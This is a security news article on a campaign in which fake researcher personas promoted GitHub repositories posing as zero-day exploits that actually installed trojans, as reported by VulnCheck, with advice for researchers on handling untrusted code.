The threat actor created fake personas on Twitter for researchers at a non-existent security firm. Credit: BrownMantis In an unusual attack campaign, a hacker has been setting up rogue GitHub repositories that claim to host zero-day exploits for popular applications but which instead deliver malware. The attacker also created fake GitHub and Twitter accounts posing as security researchers and even used real photos of researchers from well-known cybersecurity firms.“The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware,” researchers from security firm VulnCheck, who found the rogue repositories, said in a report. “It’s unclear if they have been successful but given that they’ve continued to pursue this avenue of attacks, it seems they believe they will be successful.”While attacks that target security researchers are not a new development, they are relatively rare and more likely to be the work of advanced persistent threat (APT) groups looking to gain access to sensitive information that researchers have access to. This was the case with a campaign reported by Google’s Threat Analysis Group in 2021 where a government-backed North Korean entity created a web of fake accounts posing as security researchers on Twitter, Telegram, LinkedIn, and other social media platforms and used them to promote proof-of-concept exploits for existing vulnerabilities that were posted on a blog and in YouTube videos.How the GitHub fake account campaign worksThe fake accounts were used to contact other real researchers and invite them to collaborate. As part of the communication, a Visual Studio project with proof-of-concept exploit code was shared, but this project also included a malicious DLL that deployed malware on the victim’s computer. Separately, some researchers who visited the blog had their up-to-date systems exploited suggesting the attackers had access to some zero-day exploits. VulnCheck came across the first rogue repository in early May and reported it to GitHub, which promptly took it down. That repository claimed to host a zero-day remote code execution exploit for Signal, a popular secure communications app that’s well regarded in the security community. The attacker then continued to set up new accounts and repositories with fake exploits for Microsoft Exchange, Google Chrome, Discord, and Chromium.All were set up by fake accounts claiming to belong to researchers who work for a company called High Sierra Cyber Security that doesn’t seem to exist. Some of the same names and profile information were used to create Twitter accounts that were then used to promote the repositories, much like in the attack reported by Google. However, the 2021 attack seems to have involved significantly more sophistication than this latest campaign and there’s no evidence it’s the work of the same attackers. The malicious code distributed from the rogue GitHub repositories as a file called poc.py downloads one of two additional files depending on the operating system, one called cveslinux.zip, and one called cveswindows.zip. These archive files are then unpacked and the file inside is executed. The Windows payload is detected by 36 antivirus programs on VirusTotal as a trojan program, while the Linux binary is flagged by 25.“It isn’t clear if this is a single individual with too much time on their hands or something more advanced like the campaign uncovered by Google TAG in January 2021,” the VulnCheck researchers said. “Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand.”Experienced security researchers generally take precautions when working with potentially malicious code. If they’re testing a proof-of-concept exploit, this is most likely to happen on a test system inside a virtual machine that’s well monitored and later wiped. Executing such code on a work machine would most likely be a violation of standard security policies in most organizations, especially inside a cybersecurity company. Related content news Amazon debuts biometric security device, updates Detective and GuardDuty Amazon’s latest security offerings, announced at its re:Invent conference, cover everything from advanced biometrics to new tools for defeating runtime and cloud threats, including identity and access management (IAM) capabilities. By Jon Gold Nov 29, 2023 3 mins Biometrics Security Monitoring Software Threat and Vulnerability Management news Almost all developers are using AI despite security concerns, survey suggests About 96% of developers are using AI tools and nearly eight out of 10 coders are bypassing security policies to use them, while placing unfounded trust into AI’s competence and security, according to the report by Snyk. By John Mello Jr. Nov 29, 2023 4 mins Development Tools Security Practices Supply Chain news FBI probes Pennsylvanian water utility hack by pro-Iran group Federal and state investigations are underway for the recent pro-Iran hack into a Pennsylvania-based water utility targeting Israel-made equipment. By Shweta Sharma Nov 29, 2023 4 mins Cyberattacks Utilities Industry feature 3 ways to fix old, unsafe code that lingers from open-source and legacy programs Code vulnerability is not only a risk of open-source code, with many legacy systems still in use — whether out of necessity or lack of visibility — the truth is that cybersecurity teams will inevitably need to address the problem. By Maria Korolov Nov 29, 2023 9 mins Security Practices Vulnerabilities Security Podcasts Videos Resources Events SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe